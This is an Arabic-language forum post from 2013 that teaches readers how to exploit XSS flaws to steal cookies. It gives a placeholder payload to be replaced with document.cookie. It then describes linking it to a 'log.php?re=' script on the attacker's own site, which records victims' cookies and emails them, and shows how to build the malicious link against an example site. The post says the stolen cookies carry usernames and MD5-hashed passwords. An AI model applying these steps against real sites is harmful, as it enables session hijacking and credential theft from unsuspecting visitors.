السلام عليكم ورحمه الله وبركاته :
نأتي الان الى الكود المهم في ثغرات xss
هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات
XSS
كود :
**********javascript:alert(****************)
يمكنك تغيير * بأي رقم تريده للتجربة فقط
هذا السكربت و ظيفته هي سرقة الكوكيز و هذا الكوكيز يحتوي على اليوزر نايم و الباسوورد المشفر ب الامدي 5
جيد الان سنقوم بربط السكربت باللوج
ماهو اللوج ؟
اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز التي تخصه في هذا اللوج و يرسل الى ايمايلك او يحفظ في اللوج على حسب طريقة صنعك له
مثال لطريقة ربط اللوج
log.php?re=
كود :
**********javascript:alert(****************)
الان بعدما ربطنا السكربت باللوج ناتي لربطه برابط الموقع
مثال لطريقة ربط السكربت و اللوج برابط الموقع
انا عندي مثلا رابط الموقع هو
http://www.dark.night.com/
سيكون الستغلال بالشكل التالي
http://www.dark.night.com/log.php?re
كود :
**********javascript:alert(****************)
و الان ساضع رابط اللوج بالمرفقات يجب عليك تحميله و تنفيد الاوامر التالية
ضع بدل هذه الجملة ايمايلك
h- -تم حذف االبريد بواسطة الادارة _برجاء الالتزام بقوانين المنتديات مع الشكر _الادارة -
php افتح المفكره وحط الكود ولاتنسى تغير الايميل واحفظه بامتداد
وارفعه على موقعك او على موقع اخر
استبدل النجوم بالكلمه هذي
d o c u m e n t.c o o k i e
الرئيسية 
موضوع: استغلال ثغرة xss 
السبت سبتمبر 21, 2013 4:09 pm
